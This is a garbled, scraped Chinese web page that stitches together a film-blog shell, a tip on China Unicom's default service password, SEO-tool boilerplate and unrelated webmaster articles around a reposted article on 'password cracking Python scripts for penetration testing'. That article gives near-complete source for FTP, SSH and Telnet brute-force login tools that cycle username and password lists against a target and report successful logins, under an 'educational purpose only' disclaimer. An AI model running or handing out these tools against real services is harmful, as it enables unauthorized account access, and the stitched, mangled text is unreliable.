YY5163脚本linux初始化脚本密码多少

.: 欢迎访问YY影视 :.
影视剧,基本都在&yy.我在别人yy的同时,记下自己的流水帐
.: 最近更新文章 :.
.: 栏目分类 :.
.: 最近收到的评论 :.
[]( 18:03:44)[]( 11:05:13)[]( 11:03:18)[]( 08:52:56)[]( 23:21:30)[]( 13:55:53)[]( 22:40:06)[]( 22:37:12)[]( 18:03:10)[]( 15:26:13)
.: 最近收到的引用通告 :.
每月档案&&
.: 友情链接 :.
Powered By
&All Rights Reserved
http://yydidi.mysmth.net联通初始服务密码是什么如何重置初始密码
服务密码是办理手机业务所必须的,很多用联通新手机卡的朋友都不知道联通默认的初始服务密码是什么?联通初始服务密码是手机号码的后6位,可以拨打联通的客服热线10010重置初始密码
服务密码是办理手机业务所必须的,不管是网上营业厅还是手机客服等渠道都需要用到。很多用联通新手机卡的朋友都不知道联通默认的初始服务密码是什么?
联通初始服务密码是手机号码的后6位,网上营业厅首次使用初始服务密码的时候系统就会提示重置初始密码,照着提示操作即可重置初始密码。当然也可以拨打联通的客服热线10010重置初始密码。document.write('&&&&');
请输入你要查询的地址:
更新TKD缓存
三月平均:--&&ALEXA数据预估流量:相关数据不充分,无法统计。
PR &&&&&&百度权重 &&&&&&百度快照 &&&&&&首页位置 &&&&&&外链
百度索引量:&&预计来路:&IP&&&&&&
本站反链:--条
该网站IP:-- 地址:-- 有约 -- 个站点运行在此服务器上
一般不超过80个字符
网站关键词
一般不超过100个字符
一般不超过200个字符
关键词排名分析
数据载入中,请稍候。
数据载入中,请稍候。
最近查询:&&&&&&&&&&&&&&&&&&&&
其他功能:
& 爱站网 版权所有
About Aizhan渗透用的python脚本之密码破解-阿里云资讯网
渗透用的python脚本之密码破解
发布时间:
更新时间:
来源:网络
作者:prettycathy
python脚本
当中,免不了要进行密码破解。以下为
集的一些python暴力破解脚本,并非原创作品,但有借鉴意义。498)this.w
h=498;' onmousewheel = 'javascript:return big(this)' style=&width: 433 height: 260px& border=&0& alt=&渗透用的python脚本之密码破解& src=&/wyfs02/M00/24/FD/wKioL1NYaLChBzSRAATep-nOfHw404.jpg& width=&857& height=&565& /&FTP暴力破解脚本 001 #!/usr/bin/env python 002 #-*-coding = utf-8-*- 003 #author:@xfk 004 #blog:@.cn/kaiyongdeng 005 #date:@ 006 007 importsys, os, time 008 fromftplibimportFTP 009 docs=&&& 010 [*] This was written for educational purpose and pentest only. Use it at your own risk. 011 [*] Author will be not responsible for any damage! 012 [*] Toolname : ftp_bf.py 013 [*] Coder : 014 [*] Version : 0.1 015 [*] eample of use : python ftp_bf.py -t
names.txt -p passwords.txt 016 &&& 017 018 ifsys.platform=='linux'orsys.platform=='linux2': 019 clearing='clear' 020 else: 021 clearing='cls' 022 os.system(clearing) 023 R=&\033[31m&; 024 G=&\033[32m&; 025 Y=&\033[33m& 026 END=&\033[0m& 027 deflogo(): 028 printG+&\n |---------------------------------------------------------------|& 029 print& | |& 030 print& | .cn/kaiyongdeng |& 031 print& | 08/05/2012 ftp_bf.py v.0.1 |& 032 print& | FTP Brute Forcing Tool |& 033 print& | |& 034 print& |---------------------------------------------------------------|\n& 035 print& \n [-] %s\n&%time.strftime(&%X&) 036 printdocs+END 037 038 defhelp(): 039 printR+&[*]-t, --target ip/hostname && Our target& 040 print&[*]-u, --usernamelist usernamelist && usernamelist path& 041 print&[*]-p, --passwordlist passwordlist && passwordlist path& 042 print&[*]-h, --help help && print this help& 043 print&[*]Example : python ftp_bf -t
-u username.txt -p passwords.txt&+END sys.exit(1) 044 045 defbf_login(hostname,username,password): 046 # sys.stdout.write(&\r[!]Checking : %s & % (p)) 047 # sys.stdout.flush() 048 try: 049 ftp=FTP(hostname) 050 ftp.login(hostname,username, password) 051 ftp.retrlines('list') 052 ftp.quit() 053 printY+&\n[!] w00t,w00t!!! We did it ! & 054 print&[+] Target : &,hostname, && 055 print&[+] User : &,username, && 056 print&[+] Password : &,password, &&+END 057 return1 058 # sys.exit(1) 059 exceptException, e: 060 passexceptKeyboardInterrupt:printR+&\n[-] Exiting ...\n&+END 061 sys.exit(1) 062 063 defanon_login(hostname): 064 try: 065 printG+&\n[!] Checking for anonymous login.\n&+END 066 ftp=FTP(hostname) ftp.login() 067 ftp.retrlines('LIST') 068 printY+&\n[!] w00t,w00t!!! Anonymous login successfuly !\n&+END 069 ftp.quit() 070 exceptException, e: 071 printR+&\n[-] Anonymous login failed...\n&+END 072 pass 073 074 defmain(): 075 logo() 076 try: 077 forarginsys.argv: 078 ifarg.lower()=='-t'orarg.lower()=='--target': 079 hostname=sys.argv[int(sys.argv[1:].index(arg))+2] 080 elifarg.lower()=='-u'orarg.lower()=='--usernamelist': 081 usernamelist=sys.argv[int(sys.argv[1:].index(arg))+2] 082 elifarg.lower()=='-p'orarg.lower()=='--passwordlist': 083 passwordlist=sys.argv[int(sys.argv[1:].index(arg))+2] 084 elifarg.lower()=='-h'orarg.lower()=='--help': 085 help() 086 eliflen(sys.argv) &=1: 087 help() 088 except: 089 printR+&[-]Cheak your parametars input\n&+END 090 help() 091 092 printG+&[!] BruteForcing target ...&+END 093 anon_login(hostname) 094 # print &here is ok& 095 # print hostname 096 try: 097 usernames=open(usernamelist,&r&) 098 user=usernames.readlines() 099 count1=0 100 whilecount1 &len(user): 101 user[count1]=user[count1].strip() 102 count1+=1 103 except: 104 printR+&\n[-] Cheak your usernamelist path\n&+END 105 sys.exit(1) 106 107 # print &here is ok &,usernamelist,passwordlist 108 try: 109 passwords=open(passwordlist,&r&) 110 pwd=passwords.readlines() 111 count2=0 112 whilecount2 &len(pwd): 113 pwd[count2]=pwd[count2].strip() 114 count2+=1 115 except: 116 printR+&\n[-] Check your passwordlist path\n&+END 117 sys.exit(1) 118 119 printG+&\n[+] Loaded:&,len(user),&usernames& 120 print&\n[+] Loaded:&,len(pwd),&passwords& 121 print&[+] Target:&,hostname 122 print&[+] Guessing...\n&+END 123 foruinuser:forpinpwd: 124 result=bf_login(hostname,u.replace(&\n&,&&),p.replace(&\n&,&&)) 125 ifresult !=1: 126 printG+&[+]Attempt uaername:%s password:%s...&%(u,p)+R+&Disenable&+END 127 else: 128 printG+&[+]Attempt uaername:%s password:%s...&%(u,p)+Y+&Enable&+END 129 ifnotresult : 130 printR+&\n[-]There is no username ans password enabled in the list.& 131 print&[-]Exiting...\n&+END 132 133 if__name__==&__main__&: 134 main() SSH暴力破解 001 #!/usr/bin/env python 002 #-*-coding = UTF-8-*- 003 #author@:dengyongkai 004 #blog@:.cn/kaiyongdeng 005 006 007 importsys 008 importos 009 importtime 010 #from threading import Thread 011 012 try: 013 fromparamikoimportSSH
014 fromparamikoimportAutoAddPolicy 015 exceptImportError: 016 printG+''' 017 You need paramiko module. 018 019 http://www.lag.net/paramiko/ 020 021 Debian/Ubuntu: sudo
install aptitude 022 : sudo aptitude install python-paramiko\n'''+END 023 sys.exit(1) 024 025 docs=&&& 026 [*] This was written for educational purpose and pentest only. Use it at your own risk. 027 [*] Author will be not responsible for any damage! 028 [*] Toolname : ssh_bf.py 029 [*] Author : xfk 030 [*] Version : v.0.2 031 [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help] 032 &&& 033 034 035 ifsys.platform=='linux'orsys.platform=='linux2': 036 clearing='clear' 037 else: 038 clearing='cls' 039 os.system(clearing) 040 041 042 R=&\033[31m&; 043 G=&\033[32m&; 044 Y=&\033[33m& 045 END=&\033[0m& 046 047 048 deflogo(): 049 printG+&\n |---------------------------------------------------------------|& 050 print& | |& 051 print& | .cn/kaiyongdeng |& 052 print& | 16/05/2012 ssh_bf.py v.0.2 |& 053 print& | SSH Brute Forcing Tool |& 054 print& | |& 055 print& |---------------------------------------------------------------|\n& 056 print& \n [-] %s\n&%time.ctime() 057 printdocs+END 058 059 060 defhelp(): 061 printY+& [*]-H --hostname/ip &&the target hostname or ip address& 062 print& [*]-P --port &&the ssh service port(default is 22)& 063 print& [*]-U --usernamelist &&usernames list file& 064 print& [*]-P --passwordlist &&passwords list file& 065 print& [*]-H --help &&show help information& 066 print& [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]&+END 067 sys.exit(1) 068 069 defBruteForce(hostname,port,username,password): 070 ''' 071 Create SSH connection to target 072 ''' 073 ssh=SSHClient() 074 ssh.set_missing_host_key_policy(AutoAddPolicy()) 075 try: 076 ssh.connect(hostname, port, username, password, pkey=None, timeout=None, allow_
=False, look_for_keys=False) 077 status='ok' 078 ssh.close() 079 exceptException, e: 080 status='error' 081 pass 082 returnstatus 083 084 085 defmakelist(file): 086 ''' 087 Make usernames and passwords lists 088 ''' 089 items=[] 090 091 try: 092 fd=open(file,'r') 093 exceptIOError: 094 printR+'unable to read file \'%s\''%file+END 095 pass 096 097 exceptException, e: 098 printR+'unknown error'+END 099 pass 100 101 forlineinfd.readlines(): 102 item=line.replace('\n', '').replace('\r', '') 103 items.append(item) 104 fd.close() 105 returnitems 106 107 defmain(): 108 logo() 109 # print &hello wold& 110 try: 111 forarginsys.argv: 112 ifarg.lower()=='-t'orarg.lower()=='--target': 113 hostname=str(sys.argv[int(sys.argv[1:].index(arg))+2]) 114 ifarg.lower()=='-p'orarg.lower()=='--port': 115 port=sys.argv[int(sys.argv[1:].index(arg))+2] 116 elifarg.lower()=='-u'orarg.lower()=='--userlist': 117 userlist=sys.argv[int(sys.argv[1:].index(arg))+2] 118 elifarg.lower()=='-w'orarg.lower()=='--wordlist': 119 wordlist=sys.argv[int(sys.argv[1:].index(arg))+2] 120 elifarg.lower()=='-h'orarg.lower()=='--help': 121 help() 122 eliflen(sys.argv) &=1: 123 help() 124 except: 125 printR+&[-]Cheak your parametars input\n&+END 126 help() 127 printG+&\n[!] BruteForcing target ...\n&+END 128 # print &here is ok& 129 # print hostname,port,wordlist,userlist 130 usernamelist=makelist(userlist) 131 passwordlist=makelist(wordlist) 132 133 printY+&[*] SSH Brute Force Praparing.& 134 print&[*] %s user(s) loaded.&%str(len(usernamelist)) 135 print&[*] %s password(s) loaded.&%str(len(passwordlist)) 136 print&[*] Brute Force Is Starting.......&+END 137 try: 138 forusernameinusernamelist: 139 forpasswordinpasswordlist: 140 printG+&\n[+]Attempt uaername:%s password:%s...&%(username,password)+END 141
=BruteForce(hostname, port, username, password) 142 ifcurrent=='error': 143 printR+&[-]O*O The username:%s and password:%s Is Disenbabled...\n&%(username,password)+END 144 # pass 145 else: 146 printG+&\n[+] ^-^ HaHa,We Got It!!!& 147 print&[+] username: %s&%username 148 print&[+] password: %s\n&%password+END 149 # sys.exit(0) 150 except: 151 printR+&\n[-] There Is Something Wrong,Pleace Cheak It.& 152 print&[-] Exitting.....\n&+END 153 raise 154 printY+&[+] Done.^-^\n&+END 155 sys.exit(0) 156 157 158 if__name__==&__main__&: 159 main() TELNET密码暴力破解 01 #!usr/bin/python 02 #
Brute Forcer 03 # 04 #d3hydr8[at]gmail[dot]com 05 06 importthreading, time, random, sys, telnetlib 07 fromcopyimportcopy 08 09 iflen(sys.argv) !=4: 10 print&Usage: ./telnetbrute.py &server& &userlist& &wordlist&& 11 sys.exit(1) 12 13 try: 14 users=open(sys.argv[2],&r&).readlines() 15 except(IOError): 16 print&Error: Check your userlist path\n& 17 sys.exit(1) 18 19 try: 20 words=open(sys.argv[3],&r&).readlines() 21 except(IOError): 22 print&Error: Check your wordlist path\n& 23 sys.exit(1) 24 25 print&\n\t d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0& 26 print&\t--------------------------------------------------\n& 27 print&[+] Server:&,sys.argv[1] 28 print&[+] Users Loaded:&,len(users) 29 print&[+] Words Loaded:&,len(words),&\n& 30 31 wordlist=copy(words) 32 33 defreloader(): 34 forwordinwordlist: 35 words.append(word) 36 37 defgetword(): 38 lock=threading.Lock() 39 lock.acquire() 40 iflen(words) !=0: 41 value=random.sample(words,1) 42 words.remove(value[0]) 43 44 else: 45 print&\nReloading Wordlist - Changing User\n& 46 reloader() 47 value=random.sample(words,1) 48 users.remove(users[0]) 49 50 lock.release() 51 iflen(users)==1: 52 returnvalue[0][:-1], users[0] 53 else: 54 returnvalue[0][:-1], users[0][:-1] 55 56 classWorker(threading.Thread): 57 58 defrun(self): 59 value, user=getword() 60 try: 61 print&-&*12 62 print&User:&,user,&Password:&,value 63 tn=telnetlib.Telnet(sys.argv[1]) 64 tn.read_until(&login: &) 65 tn.write(user+&\n&) 66 ifpassword: 67 tn.read_until(&Password: &) 68 tn.write(value+&\n&) 69 tn.write(&ls\n&) 70 tn.write(&exit\n&) 71 printtn.read_all() 72 print&\t\nLogin successful:&,value, user 73 tn.close() 74 work.join() 75 sys.exit(2) 76 except: 77 pass 78 79 forIinrange(len(words)*len(users)): 80 work=Worker() 81 work.start() 82 time.
(1) 【编辑推荐】移动APP安全在渗透测试中的应用渗透测试笔记八Web应用手工渗透测试——用SQLMap进行SQL盲注测试【责任编辑:蓝雨泪 TEL:(010)】 原文:渗透用的python脚本之密码破解 返回网络安全首页
本站所有文章全部来源于互联网,版权归属于原作者。本站所有转载文章言论不代表本站观点,如是侵犯了原作者的权利请发邮件联系站长(yanjing@),我们收到后立即删除。
网站主机空间
摘要: 我们知道搜索引擎蜘蛛在访问网站的时候,有个判断因素就是网站打开速度是否快速,所以站长们在选择网站主机空间就要注意了。如果网站主机空间不稳定也会给seo带来一定影响的。 我们知道搜索引擎蜘蛛在访问网站的时候,有个判断因素就是网站打开速度是否快速,所以站长们在选择网站主机空间就要注意了。如果网站主机空间不稳定也会给seo带来一定影响的。 当搜索引擎蜘蛛来访问网站的时候,发现主机死机,无法...
摘要: 心态篇 其实做个人站长自己的心态很重要,不论你是新手站长还是经验丰富的老站长。都该把自己的心态摆正了,网上有很多什么月收入过万的软文,其实真正有几个呢。多数高手都是 心态篇 其实做个人站长自己的心态很重要,不论你是新手站长还是经验丰富的老站长。都该把自己的心态摆正了,网上有很多什么月收入过万的软文,其实真正有几个呢。多数高手都是低调赚钱的。那么个人站长要具备那些心态呢? 第一: 学会...
产品网站订单
摘要: 企业营销已经不再是传统的模式,越来越多的企业英雄通过seo优化的方法做行业关键字排名,希望可以通过关键词获得流量和订单销量,不过很多企业网站的IP流量上涨,订单销量却不 企业营销已经不再是传统的模式,越来越多的企业英雄通过seo优化的方法做行业关键字排名,希望可以通过关键词获得流量和订单销量,不过很多企业网站的IP流量上涨,订单销量却不尽如人意。 很多卖产品的网站存在的一个问题是有流...
2012年的苏宁正面临着同样的挑战。做了二十多年零售的张近东,其面临的现实挑战已经不是让苏宁如何避免撞上冰山,而是已经撞上了冰山,如何让这艘巨轮前行,而不是坐等沉没。 “泰坦尼克号”是如何沉没的? 泰坦尼克号设计中,如果船上的16个防水舱只有4个进水的话,船还可以浮在水上,但不幸的是有5个底舱的外壁被冰山撕裂了,弃船是必然的选择。 苏宁作为中国最优秀的连锁零售商,如果在线零售只是占所有社会商...
网站策划方案
摘要: 要建立一个网站,需要从网站定位,到设计、网站结构、内容准备、内外链的建设等等,是一个复杂繁琐的过程,需要准备一份网站的策划方案。本文将简要描述,从网站的定位到最终 要建立一个网站,需要从网站定位,到设计、网站结构、内容准备、内外链的建设等等,是一个复杂繁琐的过程,需要准备一份网站的策划方案。本文将简要描述,从网站的定位到最终的网站建成,整个过程。 一、网站的定位 分析:给网站定位,策...
行业网站编辑
摘要: 我们需要做一个什么样的网站?很多时候大家感觉做行业网站比较简单容易,于是越来越多的朋友涉足行业网站这一块,加上一些传统行业慢慢向互联网转移,一批批的行业网站建立起来 我们需要做一个什么样的网站?很多时候大家感觉做行业网站比较简单容易,于是越来越多的朋友涉足行业网站这一块,加上一些传统行业慢慢向互联网转移,一批批的行业网站建立起来了。然而不少朋友都问到守护一个很重要的问题是:行业网站到...

我要回帖

更多关于 lovelive刷初始脚本 的文章

 

随机推荐